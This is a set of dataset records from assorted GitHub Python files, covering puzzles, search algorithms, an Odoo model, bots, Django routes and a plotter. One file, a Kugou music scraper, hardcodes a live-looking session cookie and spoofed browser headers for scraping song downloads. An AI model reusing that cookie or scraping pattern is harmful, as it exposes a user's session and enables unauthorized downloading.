K={})'.format(self.__class__.__name__,\n self.in_channels, self.out_channels,\n self.weight.size(0))\n","repo_name":"yiqun-wang/MGCN","sub_path":"nn/mgconv.py","file_name":"mgconv.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"72"} +{"seq_id":"19740168786","text":"\"\"\"\nBattleship field validator.\nFrom: https://www.codewars.com/\nLevel: 3 kyu\nPython 3.6.0\n\nDescription:\nWrite a method that takes a field for well-known board game \"Battleship\" as an argument and returns true if it has a valid disposition of ships, false otherwise. Argument is guaranteed to be 10*10 two-dimension array. Elements in the array are numbers, 0 if the cell is free and 1 if occupied by ship.\nBattleship (also Battleships or Sea Battle) is a guessing game for two players. Each player has a 10x10 grid containing several \"ships\" and objective is to destroy enemy's forces by targetting individual cells on his field. The ship occupies one or more cells in the grid. Size and number of ships may differ from version to version. 
In this kata we will use Soviet/Russian version of the game.\n \nBefore the game begins, players set up the board and place the ships accordingly to the following rules:\n\n•\tThere must be single battleship (size of 4 cells), 2 cruisers (size 3), 3 destroyers (size 2) and 4 submarines (size 1). Any additional ships are not allowed, as well as missing ships.\n•\tEach ship must be a straight line, except for submarines, which are just single cell.\n \n•\tThe ship cannot overlap or be in contact with any other ship, neither by edge nor by corner.\n \nThis is all you need to solve this kata. If you're interested in more information about the game, visit this link.\n\"\"\"\ndef validate_battlefield(field):\n ships = {4: 0, 3: 0, 2: 0, 1: 0}\n correct_ships = {4: 1, 3: 2, 2: 3, 1: 4}\n empty_cell = 0\n empty_row = [empty_cell]*10\n\n field.insert(0, list(empty_row))\n field.insert(len(field), list(empty_row))\n\n for row in field:\n row.insert(0, empty_cell)\n row.append(empty_cell)\n\n processed_cells = []\n for row in range(len(field)):\n processed_cells.append([False] * len(field))\n\n wrong_positions = ((-1, -1), (1, -1), (1, 1), (-1, 1))\n\n for horizont_coord in range(len(field)):\n for vertical_coord in range(len(field)):\n if field[horizont_coord][vertical_coord] == 1:\n\n for position_x, position_y in wrong_positions:\n if field[horizont_coord + position_x][vertical_coord + position_y] == 1:\n return False\n\n if not processed_cells[horizont_coord][vertical_coord]:\n ship_size = 1\n if field[horizont_coord][vertical_coord+ship_size] == 1:\n while field[horizont_coord][vertical_coord+ship_size] == 1:\n processed_cells[horizont_coord][vertical_coord + ship_size] = True\n ship_size += 1\n elif field[horizont_coord+ship_size][vertical_coord] == 1:\n while field[horizont_coord+ship_size][vertical_coord] == 1:\n processed_cells[horizont_coord + ship_size][vertical_coord] = True\n ship_size += 1\n if ship_size in ships and ships[ship_size] < correct_ships[ship_size]:\n ships[ship_size] += 1\n else:\n return False\n if ships != correct_ships:\n return False\n return True\n","repo_name":"goldigor/Python_tasks","sub_path":"battleship_field_validator.py","file_name":"battleship_field_validator.py","file_ext":"py","file_size_in_byte":3242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30849231349","text":"class Solution:\n def solveNQueens(self, n: int) -> \"List[List[str]]\":\n def solve(board,col):\n if len(board)==col:\n board_out=[]\n for i in range(len(board)):\n # board_out.append([])\n board_out.append(''.join(board[i]))\n self.res.append(board_out)\n return\n\n result=False\n for i in range(len(board)):\n if isPossible(board,i,col):\n board[i][col]='Q'\n result=solve(board,col+1) or result\n board[i][col]='.'\n return result\n \n def isPossible(board,row,col):\n for i in range(col):\n if board[row][i]=='Q':\n return False\n \n i,j=row,col\n while i>=0 and j>=0:\n if board[i][j]=='Q':\n return False\n i-=1\n j-=1\n\n i,j=row,col\n while j>=0 and i 0.001:\n \n print(\"Your beliefs appear to not be normalized\")\n return\n \n print(\"Something isn't quite right with your sense function\")\n\ntest_sense()\n\n\n# ## Integration Testing\n# Before we call this \"complete\" we should perform an **integration test**. We've verified that the sense function works on it's own, but does the localizer work overall?\n# \n# Let's perform an integration test. 
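# Editor's note on the battleship validator above: it rings the 10x10 field
# with empty cells so the corner-contact checks never index out of range.
# The padding idiom in isolation (a sketch):
def pad_with_border(field, empty_cell=0):
    width = len(field[0]) + 2
    padded = [[empty_cell] * width]
    for row in field:
        padded.append([empty_cell] + list(row) + [empty_cell])
    padded.append([empty_cell] * width)
    return padded

assert pad_with_border([[1]]) == [[0, 0, 0], [0, 1, 0], [0, 0, 0]]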
First you you should execute the code in the cell below to prepare the simulation environment.\n\n# In[24]:\n\n\nfrom simulate import Simulation\nimport simulate as sim\nimport helpers\nreload(localizer)\nreload(sim)\nreload(helpers)\n\nR = 'r'\nG = 'g'\ngrid = [\n [R,G,G,G,R,R,R],\n [G,G,R,G,R,G,R],\n [G,R,G,G,G,G,R],\n [R,R,G,R,G,G,G],\n [R,G,R,G,R,R,R],\n [G,R,R,R,G,R,G],\n [R,R,R,G,R,G,G],\n]\n\n# Use small value for blur. This parameter is used to represent\n# the uncertainty in MOTION, not in sensing. We want this test\n# to focus on sensing functionality\nblur = 0.1\np_hit = 100.0\nsimulation = sim.Simulation(grid, blur, p_hit)\n\n\n# In[26]:\n\n\n# Use control+Enter to run this cell many times and observe how \n# the robot's belief that it is in each cell (represented by the\n# size of the corresponding circle) changes as the robot moves.\n# The true position of the robot is given by the red star.\n\n# Run this cell about 15-25 times and observe the results\nfor i in range(1000):\n simulation.run(1)\nsimulation.show_beliefs()\n\n# If everything is working correctly you should see the beliefs\n# converge to a single large circle at the same position as the \n# red star.\n#\n# When you are satisfied that everything is working, continue\n# to the next section\n\n\n# ## Part 3: Identify and Reproduce a Bug\n# Software has bugs. That's okay.\n# \n# A user of your robot called tech support with a complaint\n# \n# > \"So I was using your robot in a square room and everything was fine. Then I tried loading in a map for a rectangular room and it drove around for a couple seconds and then suddenly stopped working. Fix it!\"\n# \n# Now we have to debug. We are going to use a systematic approach.\n# \n# 1. Reproduce the bug\n# 2. Read (and understand) the error message (when one exists)\n# 3. Write a test that triggers the bug.\n# 4. Generate a hypothesis for the cause of the bug.\n# 5. Try a solution. If it fixes the bug, great! If not, go back to step 4.\n\n# ### Step 1: Reproduce the bug\n# The user said that **rectangular environments** seem to be causing the bug. \n# \n# The code below is the same as the code you were working with when you were doing integration testing of your new feature. See if you can modify it to reproduce the bug.\n\n# In[4]:\n\n\nfrom simulate import Simulation\nimport simulate as sim\nimport helpers\nreload(localizer)\nreload(sim)\nreload(helpers)\n\nR = 'r'\nG = 'g'\n\ngrid = [ \n [R,G,G,G,R,R,R],\n [G,G,R,G,R,G,R],\n [G,R,G,G,G,G,R],\n [R,R,G,R,G,G,G],\n]\n\nblur = 0.001\np_hit = 100.0\nsimulation = sim.Simulation(grid, blur, p_hit)\n\n# remember, the user said that the robot would sometimes drive around for a bit...\n# It may take several calls to \"simulation.run\" to actually trigger the bug.\nsimulation.run(1)\nsimulation.show_beliefs()\n\n\n# In[ ]:\n\n\nsimulation.run(1)\n\n\n# ### Step 2: Read and Understand the error message\n# If you triggered the bug, you should see an error message directly above this cell. 
The end of that message should say:\n# \n# ```\n# IndexError: list index out of range\n# ```\n# \n# And just above that you should see something like\n# \n# ```\n# path/to/your/directory/localizer.pyc in move(dy, dx, beliefs, blurring)\n# 38 new_i = (i + dy ) % width\n# 39 new_j = (j + dx ) % height\n# ---> 40 new_G[int(new_i)][int(new_j)] = cell\n# 41 return blur(new_G, blurring)\n# ```\n# \n# This tells us that line 40 (in the move function) is causing an `IndexError` because \"list index out of range\".\n# \n# If you aren't sure what this means, use Google! \n# \n# Copy and paste `IndexError: list index out of range` into Google! When I do that, I see something like this:\n# \n# ![Search Results](http://i.imgur.com/gleBmBy.png)\n# \n# Browse through the top links (often these will come from stack overflow) and read what people have said about this error until you are satisfied you understand how it's caused.\n\n# ### Step 3: Write a test that reproduces the bug\n# This will help you know when you've fixed it and help you make sure you never reintroduce it in the future. You might have to try many potential solutions, so it will be nice to have a single function to call to confirm whether or not the bug is fixed\n\n# In[5]:\n\n\n# According to the user, sometimes the robot actually does run \"for a while\" \n# - How can you change the code so the robot runs \"for a while\"?\n# - How many times do you need to call simulation.run() to consistently\n# reproduce the bug?\n# Modify the code below so that when the function is called \n# it consistently reproduces the bug.\ndef test_robot_works_in_rectangle_world():\n from simulate import Simulation\n import simulate as sim\n import helpers\n reload(localizer)\n reload(sim)\n reload(helpers)\n\n R = 'r'\n G = 'g'\n\n grid = [ \n [R,G,G,G,R,R,R],\n [G,G,R,G,R,G,R],\n [G,R,G,G,G,G,R],\n [R,R,G,R,G,G,G],\n ]\n\n blur = 0.001\n p_hit = 100.0\n for i in range(1000):\n simulation = sim.Simulation(grid, blur, p_hit)\n simulation.run(1)\n \ntest_robot_works_in_rectangle_world()\n\n\n# ### Step 4: Generate a Hypothesis\n# In order to have a guess about what's causing the problem, it will be helpful to use some Python debuggin tools\n# \n# The `pdb` module (`p`ython `d`e`b`ugger) will be helpful here!\n# \n# #### Setting up the debugger \n# 1. Open `localizer.py` and uncomment the line to the top that says `import pdb`\n# 2. Just before the line of code that is causing the bug `new_G[int(new_i)][int(new_j)] = cell`, add a new line of code that says `pdb.set_trace()`\n# 3. Run your test by calling your test function (run the cell below this one)\n# 4. You should see a text entry box pop up! For now, type `c` into the box and hit enter to **c**ontinue program execution. Keep typing `c` and enter until the bug is triggered again\n\n# In[13]:\n\n\ntest_robot_works_in_rectangle_world()\n\n\n# #### Using the debugger\n# The debugger works by pausing program execution wherever you write `pdb.set_trace()` in your code. You also have access to any variables which are accessible from that point in your code. \n# \n# Try running your test again. This time, when the text entry box shows up, type `new_i` and hit enter. You will see the value of the `new_i` variable show up in the debugger window. Play around with the debugger: find the values of `new_j`, `height`, and `width`. Do they seem reasonable / correct?\n# \n# When you are done playing around, type `c` to continue program execution. Was the bug triggered? 
Keep playing until you have a guess about what is causing the bug.\n\n# ### Step 5: Write a Fix\n# You have a hypothesis about what's wrong. Now try to fix it. When you're done you should call your test function again. You may want to remove (or comment out) the line you added to `localizer.py` that says `pdb.set_trace()` so your test can run without you having to type `c` into the debugger box.\n\n# In[14]:\n\n\ntest_robot_works_in_rectangle_world()\n\n\n# ## Congratulations!\n# You've implemented your first feature and successfully debugged a problem the robot was having with rectangular environments. Well done.\n","repo_name":"wgcv/Intro-to-Self-Driving-Cars","sub_path":"Project 1 - Two Dimensional Histogram Filter/writeup.py","file_name":"writeup.py","file_ext":"py","file_size_in_byte":13283,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"72"} +{"seq_id":"71897335913","text":"class MyDivisionZeroError(Exception):\n def __init__(self, txt):\n self.txt = txt\n\n\ndiv = lambda x, y: x / y if y != 0 else MyDivisionZeroError('Ошибка дедения на 0!!')\n\nprint(div(1, 0))\n\nprint(div(4, 2))\n","repo_name":"funfounder/python_basics","sub_path":"venv/less08_task02-1.py","file_name":"less08_task02-1.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6726906516","text":"from odoo import models, fields\n\nclass HrApplicant(models.Model):\n _inherit = \"hr.applicant\"\n \n indeed_profile = fields.Char(string=\"Indeed Profile\")\n glints_profile = fields.Char(string=\"Glints Profile\")\n nik = fields.Char(string=\"NIK\")\n gender = fields.Selection([\n ('male', 'Male'),\n ('female', 'Female')\n ],string=\"Gender\")\n dob = fields.Date(string=\"Date of Birth\")\n address = fields.Char(string=\"Address\")\n martial_status = fields.Selection([\n ('single', 'Single'),\n ('married', 'Married'),\n ('divorced', 'Divorced'),\n ], string=\"Martial Status\")\n religion = fields.Selection([\n ('islamic', 'Islam'),\n ('christian', 'Christian'),\n ('hindu', 'Hindu'),\n ('buddha', 'Buddha'),\n ('catholic', 'Catholic'),\n ('khonghucu', 'Khonghucu'),\n ('not say', 'Rather Not Say')\n ], string=\"Religion\")\n last_salary = fields.Integer(string='Last Salary')\n fresh_grad = fields.Boolean(string=\"Fresh Graduate\")\n \n experience_ids = fields.One2many('hr.experience', 'applicant_id' ,string=\"Experience\")\n ","repo_name":"Ikon-ArifN/IKON-Recruitment","sub_path":"custom_addons/ikon_recruitment/models/hr_applicant.py","file_name":"hr_applicant.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13551406839","text":"# coding=utf-8\nfrom __future__ import absolute_import\n\nimport octoprint.plugin\n\nclass OctoDisplayPlugin(octoprint.plugin.StartupPlugin, octoprint.plugin.EventHandlerPlugin):\n def on_after_startup(self):\n self._logger.info(\"Hello World! 
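# Editor's fix sketch for the localizer bug walked through in the notebook
# above. The quoted traceback shows
#     new_i = (i + dy) % width
#     new_j = (j + dx) % height
# but i indexes rows and j indexes columns, so in a rectangular grid the two
# moduli are swapped; that is why square rooms worked and rectangular ones
# raised IndexError. The corrected wrap:
def wrapped_indices(i, j, dy, dx, height, width):
    new_i = (i + dy) % height  # rows wrap by the row count
    new_j = (j + dx) % width   # columns wrap by the column count
    return int(new_i), int(new_j)

assert wrapped_indices(3, 6, dy=1, dx=1, height=4, width=7) == (0, 0)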
- OctoDisplay\")\n\n def on_event(self, event, payload):\n #if event == \"PrintStarted\":\n if event == \"Connected\":\n self._logger.info(\"OctoDisplay - Printer Connected\")\n self._logger.info(payload['port'])\n\n\n\n\n\n\n__plugin_implementations__ = [OctoDisplayPlugin()]\n","repo_name":"tapnair/OctoDisplay","sub_path":"octoprint_octodisplay/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23372561864","text":"\"\"\" PL2: single state stochastic algorithms.\"\"\"\n\nimport random\nfrom math import exp, sin, cos, pi\n\n\n# ---- RANDOM SEARCH\ndef random_search(domain,fitness,max_iter):\n \"\"\"\n domain: [...,[xi_min, xi_max]]\n \"\"\"\n best = random_candidate_float(domain)\n cost_best = fitness(best)\n for i in range(max_iter):\n candidate = random_candidate_float(domain)\n cost_candi = fitness(candidate)\n if cost_candi < cost_best:\n best = candidate\n cost_best = cost_candi\n return best\n\n\n# --- HILL-CLIMBING\ndef basic_hc(problem_size,fitness, max_iter):\n \"\"\"Maximization.\"\"\"\n candidate = random_candidate_bin(problem_size)\n cost_candi = fitness(candidate)\n for i in range(max_iter):\n next_neighbor = random_neighbor_bin(candidate)\n cost_next_neighbor = fitness(next_neighbor)\n if cost_next_neighbor >= cost_candi: \n candidate = next_neighbor\n cost_candi = cost_next_neighbor \n return candidate\n\ndef random_restart_hc(problem, fitness, max_iter,restart):\n candidate = random_candidate_bin(problem)\n cost_candidate = fitness(candidate)\n best = candidate\n cost_best = cost_candidate\n for i in range(1,max_iter+1,restart):\n j = 1\n while (j % restart) != 0:\n new_candidate = random_neighbor_bin(candidate)\n cost_new_candidate = fitness(new_candidate)\n if cost_new_candidate >= cost_candidate: \n candidate = new_candidate\n cost_candidate = cost_new_candidate \n j += 1\n if cost_candidate >= cost_best:\n best = candidate\n cost_best = cost_candidate \n candidate = random_candidate_bin(problem)\n cost_candidate = fitness(candidate)\n return best\n\n# -- SIMULATED ANNEALING\ndef simulated_annealing(domain,fitness, sigma, schedule, max_iter):\n best = random_candidate_float(domain)\n cost_best = fitness(best)\n data_best = [cost_best]\n count = 0\n time = schedule(count)\n while (count < max_iter) and (time > 0):\n candidate = random_neighbor_float(domain,best,sigma)\n cost_candi = fitness(candidate)\n if cost_candi < cost_best: \n best = candidate\n cost_best = cost_candi\n else:\n p = random.random()\n app = exp((cost_best - cost_candi)/ float(time))\n if p < app:\n best = candidate\n cost_best = cost_candi\n count += 1\n time = schedule(count)\n data_best.append(cost_best)\n return best#, data_best\n\n\ndef exp_schedule(k=20,decay=0.005, limit=5000):\n def compute(t):\n if t >= limit:\n return 0\n else:\n return k * exp(-decay * t)\n return compute\n\n# -- TABU SEARCH\ndef tabu_search(domain,fitness,sigma,tabu_size, num_tweaks, max_iter):\n best = random_candidate_float(domain)\n cost_best = fitness(best)\n data_best = [cost_best]\n tabu = [best]\n for i in range(max_iter):\n if len(tabu) > tabu_size:\n tabu.pop(0)\n candidate = random_neighbor_float(domain,best, sigma)\n for i in range(num_tweaks):\n new_candidate = random_neighbor_float(domain,best,sigma)\n if (not (similar(new_candidate,tabu, 0.01))) and ((fitness(new_candidate) < fitness(candidate))\\\n or (similar(candidate,tabu,0.01))):\n candidate = new_candidate \n \n 
cost_candi = fitness(candidate)\n        if (not (similar(candidate,tabu,0.01))) and cost_candi < cost_best: # minimization\n            best = candidate\n            cost_best = cost_candi\n        tabu.append(candidate)     \n        data_best.append(cost_best)    \n    return best#, data_best\n    \n    \ndef similar(indiv,tabu, delta):\n    \"\"\" To detect similar individuals in the tabu list.\"\"\"\n    if isinstance(indiv,int):\n        return indiv in tabu\n    if isinstance(indiv,float):\n        for elem in tabu:\n            if abs(elem - indiv) < delta:\n                return True\n    return False\n\n\n# -- ITERATED LOCAL SEARCH\ndef ils(domain,fitness, max_iter, size):\n    \"\"\"\n    Iterated Local Search: no use of memory!\n    domain: [..., [xi_min, xi_max],...]\n    fitness: function name\n    max_iter: stop condition\n    size: number of components to be perturbed\n    \"\"\"\n    initial = build_initial(domain)\n    best = local_search(domain,fitness,initial)\n    for i in range(max_iter):\n        candidate = perturb(domain,best,size)\n        new_best = local_search(domain,fitness,candidate)\n        best = acceptance(best, new_best, fitness)\n    return best\n\n# Problem specific: for reals\n\ndef build_initial(domain):\n    \"\"\"Generates an N-dimensional vector of floats.\"\"\"\n    return random_candidate_float(domain)\n    \ndef acceptance(current, candidate,fitness):\n    \"\"\"Define new local optimum. Minimizing\"\"\"\n    cost_current = fitness(current)\n    cost_candidate = fitness(candidate)\n    if cost_current < cost_candidate: # Minimization\n        return current\n    else:\n        return candidate\n    \ndef perturb(domain,individual,size, sigma=1):\n    \"\"\"Probabilistic modification of size components of a vector.\"\"\"\n    perturbed = individual[:]\n    indices = random.sample(range(len(individual)),size)\n    for indice in indices:\n        delta = random.gauss(0,sigma)\n        while not (domain[indice][0] <= perturbed[indice] + delta <= domain[indice][1]):\n            delta = random.gauss(0,sigma)\n        perturbed[indice] += delta    \n    return perturbed\n    \ndef local_search(domain,fitness,indiv,repeat=100):\n    \"\"\"simple hill-climbing.\"\"\"\n    best = indiv\n    for i in range(repeat):\n        candidate = perturb(domain,best,1)\n        if fitness(candidate) < fitness(best): # minimization\n            best = candidate    \n    return best\n\n# -- Neighborhood\n# --- For local search\ndef random_neighbor_bin(individual):\n    \"\"\"Flip one position.\"\"\"\n    new_individual = individual[:]\n    pos = random.randint(0,len(individual) - 1)\n    gene = individual[pos]\n    new_gene = (gene + 1) % 2\n    new_individual[pos] = new_gene\n    return new_individual\n\ndef random_neighbor_float(domain,individual,sigma=1):\n    new_individual = individual[:]\n    indice = random.randint(0, len(individual)-1)\n    delta = random.gauss(0,sigma)\n    while not (domain[indice][0] <= new_individual[indice] + delta <= domain[indice][1]):\n        delta = random.gauss(0,sigma)\n    new_individual[indice] += delta\n    return new_individual\n\n# -- Generate individuals\n\ndef random_candidate_bin(size):\n    return [random.choice([0,1]) for i in range(size)]\n\ndef random_candidate_float(sp):\n    return [random.uniform(sp[i][0],sp[i][1]) for i in range(len(sp))]\n\ndef random_candidate_permut(size):\n    perm = list(range(size))\n    random.shuffle(perm)  # shuffle works in place and returns None\n    return perm\n\n\n# -- Evaluate individuals\ndef onemax(individual):\n    \"\"\"Individual = list of zeros and ones.\"\"\"\n    return sum(individual)\n\ndef de_jong_f1(individual):\n    \"\"\" \n    De Jong F1 or the sphere function\n    domain: [-5.12, 5.12] for each dimension.\n    min = 0 at x = (0,0,...,0)\n    \"\"\"\n    return sum([ x_i ** 2 for x_i in individual])\n\n\n\n\nif __name__ == '__main__':\n    dimension = 3\n    search_space = [[-5.12, 5.12] for i in range(dimension)]\n    
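# The commented calls below are alternative demos; uncomment one at a time\n    # to compare the single-state strategies on OneMax / De Jong F1.\n    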
#print(random_search(search_space,de_jong_f1,120))\n    #print(basic_hc(20,onemax,120))\n    #print(random_restart_hc(20,onemax,200,30))\n    #print(exp_schedule()(20))\n    #print(simulated_annealing(search_space,de_jong_f1, 1, exp_schedule(), 15000))\n    #print(tabu_search(search_space,de_jong_f1, 1,10, 5, 150))\n    print(ils(search_space,de_jong_f1, 1500, 1))\n\n\n","repo_name":"valenca/Evolutionary-Computation-Engine","sub_path":"2/pl2.py","file_name":"pl2.py","file_ext":"py","file_size_in_byte":7584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26201392858","text":"import re\nimport requests\nimport os\ndef path_name_id(url_):\n    headers={\n    \"cookie\":'kg_mid=45c4ed38927807372ce764d929994ef1; kg_dfid=3x7mNe1egszq3tW0DH3ctDDn; kg_dfid_collect=d41d8cd98f00b204e9800998ecf8427e; Hm_lvt_aedee6983d4cfc62f509129360d6bb3d=1679101349; ACK_SERVER_10015={"list":[["gzlogin-user.kugou.com"]]}; KuGooRandom=66411679101394945; Hm_lpvt_aedee6983d4cfc62f509129360d6bb3d=1679101433',\n    \"referer\": 'https://www.kugou.com/yy/html/special.html',\n    \"user-agent\":'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.41'\n    }\n    response=requests.get(url=url_,headers=headers).text\n    path_=re.findall('<(.*?)> - 歌曲列表',response)[0]+\"\\\\\"\n    name_id_=re.findall('[0-9]+)/$', views.TaskDetail.as_view()),\n    url(r'^$', views.Index.as_view(), name=\"index\"),\n    url(r'^needs/$', views.ListNeed.as_view()),\n    url(r'^offers/$', views.ListOffer.as_view()),\n    url(r'^users/$', views.CreateUser.as_view()),\n    url(r'^needs/filter/$', views.FilterNeed.as_view()),\n    url(r'^offers/filter/$', views.FilterOffer.as_view()),\n    url(r'^needs/(?P<pk>[0-9]+)/$', views.NeedDetail.as_view(template_name = 'front/needdetail.html'), name=\"needdetail\"),\n    url(r'^offers/(?P<pk>[0-9]+)/$', views.OfferDetail.as_view(template_name = 'front/offerdetail.html'), name=\"offerdetail\"),\n    url(r'^needs/(?P<pk>[0-9]+)/update/$', views.NeedUpdate.as_view()),\n    url(r'^offers/(?P<pk>[0-9]+)/update/$', views.OfferUpdate.as_view()),\n    url(r'^users/(?P<pk>[0-9]+)/$', views.UserDetail.as_view()),\n    url(r'^users/(?P<pk>[0-9]+)/needs/$', views.ListUserNeed.as_view()),\n    url(r'^users/(?P<pk>[0-9]+)/offers/$', views.ListUserOffer.as_view()),\n    url(r'^needs/(?P<category>\\w+)/$', views.ListNeedCategory.as_view()),\n    url(r'^offers/(?P<category>[a-z0-9]+)/$', views.ListOfferCategory.as_view()),\n    url(r'^needs/location/(?P<location>[a-z0-9]+)/$', views.ListNeedLocation.as_view()),\n    url(r'^offers/location/(?P<location>[a-z0-9]+)/$', views.ListOfferLocation.as_view()),\n]\n\nurlpatterns = format_suffix_patterns(urlpatterns)","repo_name":"MrSir92/Team-E-Databas","sub_path":"database/webbservice/todoapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38637642055","text":"import telebot\nimport constants\nfrom keyboards import location_keyboard\nfrom candidate import Candidate\n\n\nbot = telebot.TeleBot(constants.TOKEN)\n\n\n@bot.message_handler(commands=['start'])\ndef send_welcome(message):\n    user_id = message.from_user.id\n    first_name = message.from_user.first_name\n    bot.send_message(user_id, constants.hello_text, parse_mode='Markdown', reply_markup=location_keyboard)\n\n    bot.send_message(57737851, f'\\u2B50\\uFE0F *New user* — '\n                               f'[{first_name}](tg://user?id={user_id}) ({user_id})', parse_mode='Markdown')\n\n\n@bot.message_handler(commands=['help'])\ndef 
send_help(message):\n    bot.send_message(message.from_user.id, constants.help_text, parse_mode='Markdown')\n\n\n@bot.message_handler(commands=['abbreviations'])\ndef send_abbreviations(message):\n    bot.send_message(message.from_user.id, constants.abbreviations, parse_mode='Markdown')\n\n\n@bot.message_handler(commands=['memo'])\ndef send_memo(message):\n    bot.send_photo(message.from_user.id, constants.memo_photo, caption=constants.memo_text, parse_mode='Markdown')\n\n\n@bot.message_handler(commands=['program'])\ndef send_program(message):\n    bot.send_message(message.from_user.id, constants.program, parse_mode='Markdown')\n\n\n@bot.message_handler(content_types=['text'])\ndef text_message(message):\n    user_id = message.from_user.id\n    text = message.text\n\n    bot.send_message(user_id, Candidate.get_my_candidate(address=text), parse_mode='Markdown',\n                     reply_markup=location_keyboard)\n\n\n@bot.message_handler(content_types=['location'])\ndef location_message(message):\n    user_id = message.from_user.id\n    location = (message.location.longitude, message.location.latitude)\n\n    bot.send_message(user_id, Candidate.get_my_candidate(location=location), parse_mode='Markdown',\n                     reply_markup=location_keyboard)\n\n\n\nbot.polling()\n","repo_name":"nickavdeev/gorprojectbot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"22652395065","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n    path('', views.index, name='index'),\n    path('signup/', views.signup, name='signup'),\n    path('signin', views.signin, name='signin'),\n    path('logout', views.logout, name='logout'),\n    # path('post/', views.post, name='post'),\n    # path('create/post', views.create_post, name='create_post'),\n]","repo_name":"Mutugiii/FYP","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28307288858","text":"import os\nimport pickle\nimport colorsys\nimport matplotlib\nimport numpy as np\nfrom ase.data.colors import jmol_colors\nfrom matplotlib import pyplot as plt\nimport matplotlib.colors as mc\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom taps.utils.shortcut import isStr, isstr, istpl, isBool, isInt, isint\nfrom taps.utils.shortcut import isflt, islst, isTpl, issclr\nfrom taps.utils.shortcut import isarr, asst, dflt\n\n\n# matplotlib.rc('text', usetex=True)\nmatplotlib.rcParams['mathtext.fontset'] = 'stix'\n# matplotlib.rc('font', family='sans-serif')\n\n\ndef setfont(font):\n    return r'\\font\\a %s at 14pt\\a ' % font\n\n\ndef lighten_color(color, amount=0.2):\n    \"\"\"\n    Lightens the given color by multiplying (1-luminosity) by the given\n    amount.\n    Input can be matplotlib color string, hex string, or RGB tuple.\n\n    Examples:\n    >> lighten_color('g', 0.3)\n    >> lighten_color('#F034A3', 0.6)\n    >> lighten_color((.3,.55,.1), 0.5)\n    \"\"\"\n    try:\n        c = mc.cnames.get(color, color)\n    except TypeError:\n        c = mc.cnames.get(tuple(color), tuple(color))\n    c = colorsys.rgb_to_hls(*mc.to_rgb(c))\n    return colorsys.hls_to_rgb(c[0], 1 - amount * (1 - c[1]), c[2])\n\n\nclass Plotter:\n    plotter_parameters = {\n        'mapfile': {dflt: \"'plotter_map.pkl'\", asst: isStr},\n        'calculate_map': {dflt: \"False\", asst: isBool},\n        'save_format': {dflt: \"'svg'\", asst: isStr},\n        'savefig': {'default': \"False\", 'assert': isBool},\n        'filename': {'default': 
\"'plotter'\", 'assert': isStr},\n 'translation': {'default': \"0.\", 'assert': 'True'},\n 'conformation': {'default': \"1.\", 'assert': '{name:s} > 0'},\n 'pbc': {'default': \"np.array([True, True, True])\", 'assert': 'True'},\n 'line_color': {'default': \"'r'\", 'assert': isstr},\n 'energy_range': {'default': \"(-100, 100)\", 'assert': isTpl},\n 'energy_digit': {'default': \"-2\", 'assert': isint},\n 'quiver_scale': {'default': \"None\", 'assert': issclr},\n\n 'lgd_ftsz': {'default': \"None\", 'assert': isint},\n 'tick_size': {'default': \"None\", 'assert': isint},\n 'plot_along_distance': {'default': 'True', 'assert': isBool},\n 'prj': {'default': \"None\", 'assert': 'True'},\n\n 'ttl2d': {'default': \"'Potential Energy Surface'\", 'assert': isstr},\n 'fgsz2d': {'default': \"(7.5, 6)\", 'assert': istpl},\n 'xlbl2d': {'default': \"r'$x$'\", 'assert': isstr},\n 'ylbl2d': {'default': \"r'$y$'\", 'assert': isstr},\n 'xlbl2dftsz': {dflt: \"13\", 'assert': isint + ' or ' + isStr},\n 'ylbl2dftsz': {dflt: \"13\", 'assert': isint + ' or ' + isStr},\n 'xlim2d': {'default': \"None\", 'assert': isarr},\n 'ylim2d': {'default': \"None\", 'assert': isarr},\n 'rngX2d': {'default': \"36\", 'assert': isInt},\n 'rngY2d': {'default': \"36\", 'assert': isInt},\n 'alp2d': {'default': \"None\", 'assert': isflt},\n 'cmp2d': {'default': \"None\", 'assert': isstr},\n 'lvls2d': {'default': \"None\", 'assert': islst},\n 'inln2d': {'default': \"True\", 'assert': isBool},\n 'ftsz2d': {'default': \"None\", 'assert': isint},\n 'ftsz2dInfo': {'default': \"None\", 'assert': isint},\n 'fmt2d': {'default': \"'%.2f'\", 'assert': isstr},\n 'pthsClr2d': {'default': \"None\", 'assert': 'True'},\n\n 'ttlGMu': {dflt: \"'Gaussian Potential Energy Surface'\", asst: isstr},\n 'fgszGMu': {'default': \"(7.5, 6)\", 'assert': istpl},\n 'xlblGMu': {'default': \"r'$x$'\", 'assert': isstr},\n 'ylblGMu': {'default': \"r'$y$'\", 'assert': isstr},\n 'ftszGMuXlbl': {dflt: \"13\", 'assert': isint + ' or ' + isStr},\n 'ftszGMuYlbl': {dflt: \"13\", 'assert': isint + ' or ' + isStr},\n 'ftszGMuMx': {dflt: \"13\", 'assert': isint + ' or ' + isStr},\n 'xlimGMu': {'default': \"None\", 'assert': isarr},\n 'ylimGMu': {'default': \"None\", 'assert': isarr},\n 'cmpGMu': {'default': \"None\", 'assert': isstr},\n 